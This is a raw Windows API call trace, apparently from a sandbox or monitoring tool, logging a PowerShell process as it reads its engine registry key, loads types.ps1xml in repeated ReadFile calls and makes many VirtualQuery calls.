	[0267.228] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cf6c, lpData=0x0, lpcbData=0x20cf68*=0x0 | out: lpType=0x20cf6c*=0x1, lpData=0x0, lpcbData=0x20cf68*=0x56) returned 0x0
	[0267.228] CoTaskMemAlloc (cb=0x5a) returned 0x4b21c0
	[0267.228] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cf3c, lpData=0x4b21c0, lpcbData=0x20cf38*=0x56 | out: lpType=0x20cf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20cf38*=0x56) returned 0x0
	[0267.228] CoTaskMemFree (pv=0x4b21c0) 
	[0267.228] RegCloseKey (hKey=0x334) returned 0x0
	[0267.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0267.832] GetSystemInfo (in: lpSystemInfo=0x20bc20 | out: lpSystemInfo=0x20bc20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0267.833] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0267.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0267.844] SetErrorMode (uMode=0x1) returned 0x1
	[0267.844] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0267.844] GetFileType (hFile=0x334) returned 0x1
	[0267.844] SetErrorMode (uMode=0x1) returned 0x1
	[0267.844] GetFileType (hFile=0x334) returned 0x1
	[0267.844] ReadFile (in: hFile=0x334, lpBuffer=0x2d6fa18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2d6fa18*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.339] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.339] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.340] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.341] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.341] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.342] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.342] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.342] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.342] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.343] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.343] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.344] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.344] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.345] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.345] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.345] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.345] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.346] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.346] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.346] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.346] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.346] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.347] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.347] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.347] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.347] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.348] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.350] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.350] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.350] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.351] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.351] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.351] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.351] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.351] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1000, lpOverlapped=0x0) returned 1
	[0268.352] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x1b4, lpOverlapped=0x0) returned 1
	[0268.352] ReadFile (in: hFile=0x334, lpBuffer=0x2bd5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20cf88, lpOverlapped=0x0 | out: lpBuffer=0x2bd5780*, lpNumberOfBytesRead=0x20cf88*=0x0, lpOverlapped=0x0) returned 1
	[0268.352] CloseHandle (hObject=0x334) returned 1
	[0268.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0268.352] SetErrorMode (uMode=0x1) returned 0x1
	[0268.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cf00 | out: lpFileInformation=0x20cf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0268.352] SetErrorMode (uMode=0x1) returned 0x1
	[0268.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0268.353] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cfe8 | out: phkResult=0x20cfe8*=0x334) returned 0x0
	[0268.353] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cf6c, lpData=0x0, lpcbData=0x20cf68*=0x0 | out: lpType=0x20cf6c*=0x1, lpData=0x0, lpcbData=0x20cf68*=0x56) returned 0x0
	[0268.353] CoTaskMemAlloc (cb=0x5a) returned 0x48bc80
	[0268.353] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cf3c, lpData=0x48bc80, lpcbData=0x20cf38*=0x56 | out: lpType=0x20cf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20cf38*=0x56) returned 0x0
	[0268.353] CoTaskMemFree (pv=0x48bc80) 
	[0268.353] RegCloseKey (hKey=0x334) returned 0x0
	[0268.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0268.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.281] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.305] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.306] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.307] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.307] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.307] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.308] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.309] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.887] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.887] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.887] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.888] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.888] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.888] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.888] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.888] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.895] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.901] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.901] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.901] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.901] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.902] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.902] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.902] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.902] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.903] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.903] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.903] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.903] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.903] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
